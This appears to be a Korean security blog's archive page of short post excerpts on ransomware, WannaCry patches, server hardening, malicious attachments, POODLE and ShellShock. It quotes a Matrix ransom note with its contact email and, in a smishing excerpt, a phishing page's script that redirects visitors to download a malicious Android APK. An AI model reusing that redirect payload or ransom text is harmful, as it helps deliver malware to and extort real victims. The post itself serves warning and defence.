An Army of Thousands of Hacked Servers Found Mining Cryptocurrencies

소스: An Army of Thousands of Hacked Servers Found Mining Cryptocurrencies

해킹 된 서버 수천 군대가 광업 크립토 통화를 발견했습니다. 목요일, 2017 년 5 월 4 일 Swati Khandelwal bondnet-windows-hacking-tool 15,000 개 이상의 손상된 서버로 구성된 새로운 봇넷은 다양한 크립토 (cryptocur) 통화에 사용되어 매달 $ 25,000 정도의 수익을 창출했습니다. cryptocurrencies는 엄청난 양의 컴퓨팅 능력을 […]

mail header 분석

Version Name Version Number Outlook 97 8.0 Outlook 98 8.5 Outlook 2000 9.0 Outlook XP/2002 10.0 Outlook 2003 11.0 Outlook 2007 12.0 Outlook 2010 14.0 Outlook 2013 15.0 Outlook 2016 16.0

링크 : https://toolbox.googleapps.com/apps/messageheader/

 

랜섬웨어(Ransomware) Matrix

#How_to_return_files#

Wаrning! Аll yоur filеs wеrе еnсryрtеd with RSА-2048 аlgоrithm.

Withоut уоur pеrsоnаl dесrуptiоn kеy dаtа rеcоvеrу is impоssiblе!

Tо gеt yоur uniquе kеy аnd dесrурt thе filеs, Yоu hаvе to sеnd thе fоllоwing cоdе:

45677B48199283FD tо оur е-mаil аddrеss: decodedecode@tutanota.com

Yоu will rеciеvе аll nеcеssаry instruсtiоns.

Yоu hаvе оnlу 96 hоurs tо rеcоvеr yоur […]

wannacryptor ransomware pache download 윈도우 모든버젼 보안팩

Windows XP SP2(64비트 시스템용) http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa

Windows XP SP3 (32비트 시스템용) https://www.microsoft.com/ko-KR/download/details.aspx?id=55245 Windows XP Embedded SP3(32비트 시스템용) https://www.microsoft.com/ko-KR/download/details.aspx?id=55247

Windows 8(32비트 시스템용) https://www.microsoft.com/ko-KR/download/details.aspx?id=55246

Windows 8(64비트 시스템용) https://www.microsoft.com/ko-KR/download/details.aspx?id=55249

Windows 8.1(32비트 시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012213

Windows 8.1(64비트 시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012213

WindowsVista서비스팩\2 http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012598

WindowsVista(64비트시스템용)서비스팩2 http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012598

Windows7(32비트시스템용)서비스팩1 http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012212 Windows7(64비트시스템용)서비스팩1 http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012212

Windows10(32비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012606

Windows10(64비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4012606

Windows10버전1511(32비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4013198

Windows10버전1511(64비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4013198

Windows10버전1607(32비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4013429

Windows10버전1607(64비트시스템용) http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4013429

Windows Server […]

Remove BrowserModifier:Win32/SupTab 간단하게 제거 하기

프로그램 추가 삭제에서 의심스러운 프로그램 제거 (OnlineMapFinder Internet Explorer Homepage and New Tab)

SQL Server 기본포트(1433)와 sa계정의 위험성

▷ Sql 서버가 감지되면 sa 계정으로 비밀번호를 조합하여 될때까지 무차별 대입공격 접속을 시도한다.

▷ 반드시 접속포트를 바꾸고 웹인경우 로컬만 접속이 가능하도록한다. ▷ sa 계정은 중지시켜 접속할수 없도록 한다.

▶ 이벤트 로그에서 중국IP의 접속사항을 파악 할 수 있다.

▶ 아이피를 추적해보면 중국IP란것을 알수 있다.

▶ 예제는 express버전 : 1433 포트 바꾸기 // 다른 […]

winserver 2012 ping 막기(IP제한)

▶ 개인, 공용 프로필 방화벽을 활성화 되어 있는지 확인한다. /안되어 있으면 활성화 시킨다.

▶ 파일 및 프린터 공유(에코 요청- ICMPv4-In) 규칙 사용안함으로 하면 완전히 Ping을 막을 수 있다 . ▶IP영역을 지정해서 특정아이피으로만 Ping 확인 할 수 있게 할 수 있다.

▶ cmd 에서 특정 IP으로만 ping 되는지 확인한다.

[…]

FOLIODETE.scr trojan

이메일에 첨부되는 FOLIODETE.scr Trojan 첨부된 악선코드 파일 : 함부로 클릭하지 마세요.

 

랜섬웨어 CryptoLocker 한글 사이트

랜섬웨어 CryptoLocker 한글 사이트 오픈 IT 강국이 이젠 IT 호갱이 되고 있음. 노대통령이 그립습니다.

랜섬웨어 CryptoLocker에 감염되었을 경우 복구 방법

아직 없음

안됨 랜섬웨어 CryptoLocker에 감염되었을 경우 복구 방법. 요즘건 안됩.

http://blog.naver.com/PostView.nhn?blogId=hahaj1&logNo=20200811063

1404UK_TPL_screen.zip 이메일 첨부파일

이메일제목 :Discount Structure 2015 내용: Please find attached a PDF copy of the 2015 price list and discount structure

1404UK_TPL_screen.zip 첨부파일 다운로드후 압축 풀면 1404UK_TPL_screen.exe 악성코드

midimapbits.dll 바이러스 삭제

v3lite 돌린다.

[linux] 백신 ClamAV

참조 : http://www.clamav.net/doc/install.html#Debian

참조 : http://auctionpro.co.kr/?p=2511

ubuntu

인스톨 sudo apt-get install clamav

검사 sudo clamscan -r /.

 

문서다운로드 : clamdoc

SSL 3 is dead, killed by the POODLE attack // 보인인증서 SSL3가 해킹당했다는 내용

해결됨

OpenSSL에서 발생한 메모리 고갈 취약점, 푸들(Poodle, Padding Oracle On Downloaded Legacy Encryption) 취약점 등 총 4개의 취약점을 보완한 보안업데이트를 발표

CVE-2014-3513 : DTLS SRTP 핸드쉐이크 메시지를 처리하는 중 발생하는 메모리 고갈 CVE-2014-3567 : SSL/TLS/DTLS 서버에서 session ticket 값을 받을 때 발생하는 메모리 CVE-2014-3566 : SL3.0에서 다운 그레이드를 통해 MITM(man-in-the-middle)공격을 가능하게 하는 Poodle(Padding Oracle On […]

9월 25일 발견된 Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169)

최근 9월 25일 발견된 Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169)에 대하여 안내 드립니다.

– 이름 : Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169) – 취약점 정보 : GNU bash 4.3 및 이전 버전 GNU bash 취약점을 이용하여 여러가지 공격 유형이 탐지되고 있음 ex) 백도어 생성, 악성코드 다운로드, 패스워드 파일 탈취, 웹쉘 생성, 파일 삭제, 시스템 […]

스마트폰 피싱 문자=> KB 은행 앱 해킹용

[법원] 민사소송 출석명령서입니다. 라고 문자 날라와서.

크롬으로 사이트 들어가 보니 <script>location.replace(‘https://www.dropbox.com/s/ev44e5vwd8joyac/16yk.apk?dl=1’);</script> 16yk.apk 파일 다운로드 되네요. 아이폰에는 안갈리겠고 안드로이드용 입니다.

털림 1.특정 SMS 계정 털림 (국내) 2. url.kr 사이트 ftp 털림 (국내) 3. dropbox.com ftp 털림 (해외 :미국)

소스 확인해보니 k b _ c a r d _ l a y o u t […]

win server FTP Event log

잘못된 ftp 계정으로 로그인 하면 시스템 로그 보안경고 1개 와 보안 실패감사 로그 2개가 생성된다.

시스템 이벤트번호는 100 보안이벤트 번호는 529와 680 이다.

Trojan/Win32.Necurs 바이러스 제거

하드때서 외장하드로 연결해 V3 돌리거나

MS 에서 하는 백신 한번 돌리면 검색 되고 치료 됩니다. http://www.microsoft.com/security/scanner/ko-kr/default.aspx

네이버 ID PASS 체크기

네이버가 제일 뚫기 쉬웠다는 고등학생이 개발한 프로그램

유튜브 에러 메시지 2014-02-18 오전 12:30

500 Internal Server Error

Sorry, something went wrong.

A team of highly trained monkeys has been dispatched to deal with this situation.

If you see them, show them this information: